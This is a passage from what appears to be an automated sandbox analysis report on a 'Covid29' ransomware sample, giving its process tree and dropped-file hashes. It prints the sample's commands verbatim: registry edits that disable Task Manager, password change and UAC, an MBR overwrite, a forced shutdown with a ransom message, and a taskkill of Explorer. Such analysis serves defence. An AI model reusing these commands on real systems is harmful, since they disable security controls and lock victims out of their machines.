                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4404
                                                                        • C:\Users\Admin\AppData\Local\Temp\3733.tmp\Cov29LockScreen.exe
                                                                          Cov29LockScreen.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:1340
                                                                    • C:\Windows\system32\vssvc.exe
                                                                      C:\Windows\system32\vssvc.exe
                                                                      1⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3912
                                                                    • C:\Windows\System32\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                                      1⤵
                                                                        PID:644
                                                                      • C:\Windows\explorer.exe
                                                                        C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
                                                                        1⤵
                                                                        • Modifies Internet Explorer settings
                                                                        • Modifies registry class
                                                                        • Suspicious behavior: AddClipboardFormatListener
                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:400
                                                                        • C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe
                                                                          "C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"
                                                                          2⤵
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
                                                                          PID:3672
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E536.tmp\TrojanRansomCovid29.bat" "
                                                                            3⤵
                                                                            • Checks computer location settings
                                                                            • Modifies registry class
                                                                            PID:2192
                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\E536.tmp\fakeerror.vbs"
                                                                              4⤵
                                                                                PID:3028
                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                ping localhost -n 2
                                                                                4⤵
                                                                                • Runs ping.exe
                                                                                PID:3968
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                4⤵
                                                                                • Modifies registry key
                                                                                PID:3296
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                                                4⤵
                                                                                • Modifies registry key
                                                                                PID:2988
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                                4⤵
                                                                                • Modifies registry key
                                                                                PID:4872
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                                4⤵
                                                                                • Modifies registry key
                                                                                PID:2828
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                                                                4⤵
                                                                                • Modifies registry key
                                                                                PID:4960
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                                                4⤵
                                                                                • UAC bypass
                                                                                • Modifies registry key
                                                                                PID:2840
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                4⤵
                                                                                • UAC bypass
                                                                                • Modifies registry key
                                                                                PID:3048
                                                                              • C:\Users\Admin\AppData\Local\Temp\E536.tmp\mbr.exe
                                                                                mbr.exe
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Writes to the Master Boot Record (MBR)
                                                                                PID:4800
                                                                              • C:\Users\Admin\AppData\Local\Temp\E536.tmp\Cov29Cry.exe
                                                                                Cov29Cry.exe
                                                                                4⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1644
                                                                                • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4536
                                                                              • C:\Windows\SysWOW64\shutdown.exe
                                                                                shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                                                                4⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:4020
                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                ping localhost -n 9
                                                                                4⤵
                                                                                • Runs ping.exe
                                                                                PID:4312
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im explorer.exe
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                PID:1492
                                                                              • C:\Users\Admin\AppData\Local\Temp\E536.tmp\Cov29LockScreen.exe
                                                                                Cov29LockScreen.exe
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5040
                                                                          • C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe
                                                                            "C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"
                                                                            2⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            PID:624
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F255.tmp\TrojanRansomCovid29.bat" "
                                                                              3⤵
                                                                              • Checks computer location settings
                                                                              • Modifies registry class
                                                                              PID:2004
                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\F255.tmp\fakeerror.vbs"
                                                                                4⤵
                                                                                  PID:5100
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping localhost -n 2
                                                                                  4⤵
                                                                                  • Runs ping.exe
                                                                                  PID:5092
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                  4⤵
                                                                                  • Modifies registry key
                                                                                  PID:4804
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                                                  4⤵
                                                                                  • Modifies registry key
                                                                                  PID:1432
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                                  4⤵
                                                                                  • Modifies registry key
                                                                                  PID:3300
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                                  4⤵
                                                                                  • Modifies registry key
                                                                                  PID:4036
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                                                                  4⤵
                                                                                  • Modifies registry key
                                                                                  PID:3536
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                                                  4⤵
                                                                                  • UAC bypass
                                                                                  • Modifies registry key
                                                                                  PID:3108
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                  4⤵
                                                                                  • UAC bypass
                                                                                  • Modifies registry key
                                                                                  PID:1020
                                                                                • C:\Users\Admin\AppData\Local\Temp\F255.tmp\mbr.exe
                                                                                  mbr.exe
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Writes to the Master Boot Record (MBR)
                                                                                  PID:440
                                                                                • C:\Users\Admin\AppData\Local\Temp\F255.tmp\Cov29Cry.exe
                                                                                  Cov29Cry.exe
                                                                                  4⤵
                                                                                  • Checks computer location settings
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4944
                                                                                  • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4460
                                                                                • C:\Windows\SysWOW64\shutdown.exe
                                                                                  shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                                                                  4⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4544
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping localhost -n 9
                                                                                  4⤵
                                                                                  • Runs ping.exe
                                                                                  PID:3812
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /f /im explorer.exe
                                                                                  4⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:2684
                                                                                • C:\Users\Admin\AppData\Local\Temp\F255.tmp\Cov29LockScreen.exe
                                                                                  Cov29LockScreen.exe
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:4836
                                                                            • C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe
                                                                              "C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"
                                                                              2⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              PID:1844
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F8DD.tmp\TrojanRansomCovid29.bat" "
                                                                                3⤵
                                                                                • Checks computer location settings
                                                                                • Modifies registry class
                                                                                PID:848
                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\F8DD.tmp\fakeerror.vbs"
                                                                                  4⤵
                                                                                    PID:1360
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    ping localhost -n 2
                                                                                    4⤵
                                                                                    • Runs ping.exe
                                                                                    PID:3920
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                    4⤵
                                                                                    • Modifies registry key
                                                                                    PID:2264
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                                                    4⤵
                                                                                    • Modifies registry key
                                                                                    PID:4632
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                                    4⤵
                                                                                    • Modifies registry key
                                                                                    PID:1260
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                                    4⤵
                                                                                    • Modifies registry key
                                                                                    PID:4840
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                                                                    4⤵
                                                                                    • Modifies registry key
                                                                                    PID:232
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                                                    4⤵
                                                                                    • UAC bypass
                                                                                    • Modifies registry key
                                                                                    PID:4176
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                    4⤵
                                                                                    • UAC bypass
                                                                                    • Modifies registry key
                                                                                    PID:1888
                                                                                  • C:\Users\Admin\AppData\Local\Temp\F8DD.tmp\mbr.exe
                                                                                    mbr.exe
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Writes to the Master Boot Record (MBR)
                                                                                    PID:4924
                                                                                  • C:\Users\Admin\AppData\Local\Temp\F8DD.tmp\Cov29Cry.exe
                                                                                    Cov29Cry.exe
                                                                                    4⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4524
                                                                                    • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4924
                                                                                  • C:\Windows\SysWOW64\shutdown.exe
                                                                                    shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                                                                    4⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2716
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    ping localhost -n 9
                                                                                    4⤵
                                                                                    • Runs ping.exe
                                                                                    PID:3044
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /f /im explorer.exe
                                                                                    4⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:1364
                                                                                  • C:\Users\Admin\AppData\Local\Temp\F8DD.tmp\Cov29LockScreen.exe
                                                                                    Cov29LockScreen.exe
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4956
                                                                              • C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe
                                                                                "C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"
                                                                                2⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                PID:5036
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\502.tmp\TrojanRansomCovid29.bat" "
                                                                                  3⤵
                                                                                  • Checks computer location settings
                                                                                  • Modifies registry class
                                                                                  PID:4824
                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\502.tmp\fakeerror.vbs"
                                                                                    4⤵
                                                                                      PID:4532
                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                      ping localhost -n 2
                                                                                      4⤵
                                                                                      • Runs ping.exe
                                                                                      PID:2332
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                      4⤵
                                                                                      • Modifies registry key
                                                                                      PID:2276
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                                                      4⤵
                                                                                      • Modifies registry key
                                                                                      PID:3292
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                                      4⤵
                                                                                      • Modifies registry key
                                                                                      PID:4764
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                                      4⤵
                                                                                      • Modifies registry key
                                                                                      PID:4236
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                                                                      4⤵
                                                                                      • Modifies registry key
                                                                                      PID:3628
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                                                      4⤵
                                                                                      • UAC bypass
                                                                                      • Modifies registry key
                                                                                      PID:3032
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                      4⤵
                                                                                      • UAC bypass
                                                                                      • Modifies registry key
                                                                                      PID:2324
                                                                                    • C:\Users\Admin\AppData\Local\Temp\502.tmp\mbr.exe
                                                                                      mbr.exe
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      • Writes to the Master Boot Record (MBR)
                                                                                      PID:3920
                                                                                    • C:\Users\Admin\AppData\Local\Temp\502.tmp\Cov29Cry.exe
                                                                                      Cov29Cry.exe
                                                                                      4⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      PID:2232
                                                                                      • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4020
                                                                                    • C:\Windows\SysWOW64\shutdown.exe
                                                                                      shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                                                                      4⤵
                                                                                        PID:2136
                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                        ping localhost -n 9
                                                                                        4⤵
                                                                                        • Runs ping.exe
                                                                                        PID:4692
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /f /im explorer.exe
                                                                                        4⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:4120
                                                                                      • C:\Users\Admin\AppData\Local\Temp\502.tmp\Cov29LockScreen.exe
                                                                                        Cov29LockScreen.exe
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:2248
                                                                                • C:\Windows\system32\wbengine.exe
                                                                                  "C:\Windows\system32\wbengine.exe"
                                                                                  1⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3892
                                                                                • C:\Windows\System32\vdsldr.exe
                                                                                  C:\Windows\System32\vdsldr.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3404
                                                                                  • C:\Windows\System32\vds.exe
                                                                                    C:\Windows\System32\vds.exe
                                                                                    1⤵
                                                                                    • Checks SCSI registry key(s)
                                                                                    PID:3280
                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
                                                                                    1⤵
                                                                                      PID:4880
                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:288
                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {515980c3-57fe-4c1e-a561-730dd256ab98} -Embedding
                                                                                      1⤵
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:388

                                                                                    Network

                                                                                    MITRE ATT&CK Enterprise v15

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Cov29Cry.exe.log

                                                                                      Filesize

                                                                                      226B

                                                                                      MD5

                                                                                      28d7fcc2b910da5e67ebb99451a5f598

                                                                                      SHA1

                                                                                      a5bf77a53eda1208f4f37d09d82da0b9915a6747

                                                                                      SHA256

                                                                                      2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

                                                                                      SHA512

                                                                                      2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\98a54b9a-ad38-426c-b23d-1101f3a71953.tmp

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      5dca74fa07e4c7bc6dd25e39a2b9129e

                                                                                      SHA1

                                                                                      2505dc43dc5c1de1f1edaf1f0168ae4d8e0766e8

                                                                                      SHA256

                                                                                      ce4afe70606b8cd15defac886013b36d8af1434273efb4d33d21618f89b08ad3

                                                                                      SHA512

                                                                                      f069bc26cc9da60e593dafb1c78b9882ac6b3cab910242e9d7245ede277e6e57ce7885f7dd96f6650c0c8c1661798e09c19618b4fb2b59387ed3ea44a824bec5

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                      Filesize

                                                                                      152B

                                                                                      MD5

                                                                                      9622e603d436ca747f3a4407a6ca952e

                                                                                      SHA1

                                                                                      297d9aed5337a8a7290ea436b61458c372b1d497

                                                                                      SHA256

                                                                                      ace0e47e358fba0831b508cd23949a503ae0e6a5c857859e720d1b6479ff2261

                                                                                      SHA512

                                                                                      f774c5c44f0fcdfb45847626f6808076dccabfbcb8a37d00329ec792e2901dc59636ef15c95d84d0080272571542d43b473ce11c2209ac251bee13bd611b200a

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                      Filesize

                                                                                      152B

                                                                                      MD5

                                                                                      04b60a51907d399f3685e03094b603cb

                                                                                      SHA1

                                                                                      228d18888782f4e66ca207c1a073560e0a4cc6e7

                                                                                      SHA256

                                                                                      87a9d9f1bd99313295b2ce703580b9d37c3a68b9b33026fdda4c2530f562e6a3

                                                                                      SHA512

                                                                                      2a8e3da94eaf0a6c4a2f29da6fec2796ba6a13cad6425bb650349a60eb3204643fc2fd1ab425f0251610cb9cce65e7dba459388b4e00c12ba3434a1798855c91

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\39ba73d3-5cee-4cc6-89e7-6e833c9928b4.tmp

                                                                                      Filesize

                                                                                      6KB

                                                                                      MD5

                                                                                      7eec84483c79f24b329644640024f4a3

                                                                                      SHA1

                                                                                      beb6809d9ec92f0ace54eef9250bce2287770851

                                                                                      SHA256

                                                                                      889955e3210ec08f57be57752e496b6fd4dd0a2fdc5a4d3e20088af9f7df84d9

                                                                                      SHA512

                                                                                      789ded969f154d065231b131cd5ddeb2bdbd6d0e5f60b31d68853e846bef40fbea3fc700563ce9b7921cb196068673163360b0395b8b2d74b0fd22a025689298

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      38ff229c52435bc5c2d3983d64be08f1

                                                                                      SHA1

                                                                                      4d8b33255d05830ff05c9be5f28ab118b17ebb75

                                                                                      SHA256

                                                                                      4db2b325771bdf29f0281f0f50d569745f0014522e0e904303846692599999ea

                                                                                      SHA512

                                                                                      1cbfe94b2e2683c2180d21cc96136eb30de9a6094f616aad7ba67667bd2bf25a072e73c70c6920cd25446c736543b3185874014aeb571ad8ace3526456845200

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      79ab1efd951b0471b23991cd6ede7597

                                                                                      SHA1

                                                                                      8cdf41b141f0b14076f368249421d047c69f7416

                                                                                      SHA256

                                                                                      7a866c9cb4ee1eac9cd2fd05db42d42e5da613e53aa85e1b85a70839963c0f39

                                                                                      SHA512

                                                                                      2810cccbb1d76ad6e5d7de863d620739d521e00a3f333ace8b204db9a09bf5b03749fdd61707f879cb1e886678d74834ce0b1acbd304798f372341aae54db842

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                      Filesize

                                                                                      796B

                                                                                      MD5

                                                                                      b232ffe45432109b57046be1f885cbaa

                                                                                      SHA1

                                                                                      1bf6b8dc64b39a70757bf865491f6c4821974f29

                                                                                      SHA256

                                                                                      94ceddf12f94fc194bb3ac7881432778be73250cad3d23e4f3ff38cf6b342f2c

                                                                                      SHA512

                                                                                      f391845d9d37853417ab6fc27b04714d317de4c85c3e46947cb43bd48cac88e3fdc9966f178e47fb3cf21592fe72b81db370de179b1702b55fdb6e8215ff49a6

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                      Filesize

                                                                                      796B

                                                                                      MD5

                                                                                      d311d98315e7e1c6ea4ce0a80a787803

                                                                                      SHA1

                                                                                      37d544fee8c06bbdaf56905e6bd3a626ddc1e78e

                                                                                      SHA256

                                                                                      8ce30f26e96418c065069adc5ad7b0cf76e6712a83c46c630de35b02a5eb0046

                                                                                      SHA512

                                                                                      b9a87ff3141d7d06955d1bcaaa9f143dfef6f2e44a0007468bc497e37d09d998e4488a59b5246e102ccdb6e619a0ace96552aad6d3fb2e5fef007143cc7b54a0

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                      Filesize

                                                                                      6KB

                                                                                      MD5

                                                                                      63a9e3bf604fb8f5e024d1b4926228d1

                                                                                      SHA1

                                                                                      ae8dc8a0b4a02fadad6e0521ff0addc2a7023376

                                                                                      SHA256

                                                                                      74c0148fb3c3e8fd616ff9f01bd78b963180e290fff72258ddcd2ed66a5f6e70

                                                                                      SHA512

                                                                                      018dd51b5b31be9fdd1fe41ce0da375ade0d9402a534d79f33401f9c2372a5bf9a4e584d0d101b366d7811dae703a03442e9d9a9dd681e4dba7d9225a03911fe

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                      Filesize

                                                                                      7KB

                                                                                      MD5

                                                                                      efcdd127f7006dd481581148cb5e0f60

                                                                                      SHA1

                                                                                      7bb43ffc3fb5557246ef4241b2c9ac70606137a3

                                                                                      SHA256

                                                                                      1fc315364bfc7308e8875f2fe01c76401ec184497d7955fe80c5750b714f6b1e

                                                                                      SHA512

                                                                                      7743aac33b58ae5533c41a1c4d6b495871c991fc66d2c5c440dc1f6caad9446ab4c29f523f2fcd2f479e480f8b8aa36a5394c8a624798a596e348c6179e28530

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                      Filesize

                                                                                      7KB

                                                                                      MD5

                                                                                      8bf130f38934dc1de392aa37aaa4e9a6

                                                                                      SHA1

                                                                                      9834790e4ee0470a8f124c376b78ff93b5a16d44

                                                                                      SHA256

                                                                                      7fdbb26afbe0665c433e61dbf0ad1c3647b5b0a3986db102ceb487168f10f875

                                                                                      SHA512

                                                                                      27cd2b4df7a34ab301826f772eeb37af3e2493c80633688e3f461174aab1cff8f2f699f8fecd2f842ca97cd609e1a398e9939189d1cfb207dea69feafe43d1ee

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                      Filesize

                                                                                      6KB

                                                                                      MD5

                                                                                      e33a17ca830da4de53190a8d85a16e03

                                                                                      SHA1

                                                                                      4564c8657ed5b4c55409a61eef2367d9f5a60715

                                                                                      SHA256

                                                                                      1eb700ed48462ab30e65b3e6aabd4ec31daea19571b24619b6ede7bab9eef5f6

                                                                                      SHA512

                                                                                      a3f26bf8d149e4e6b940eb3bd2b5a84b77b0f3d4edf41f978db6387ae2c23cc3c998415880a71c815b8beebbaf95e9b813396e32f20cfa5506989ffff3afd94a

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      9467884ae4d62b0b2315fb461150afca

                                                                                      SHA1

                                                                                      e8cb66dd8e03ac854f5edb789dd7708b87d1a71f

                                                                                      SHA256

                                                                                      a2423cedcdd738c6478864530e4505e3e38e6bc7bde55a81a7e0b1394e91ee0b

                                                                                      SHA512

                                                                                      2e1424a78ec01efd67a272b2ab1a41954457659d7c5d4e433e48852f54c6236027c922e53a7bedbd8b02c87d7306104f1904bc0ac0ca9f4b2a37e5b307521c6f

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      13e2e54ec3ce59909db26a8a4ef1b3db

                                                                                      SHA1

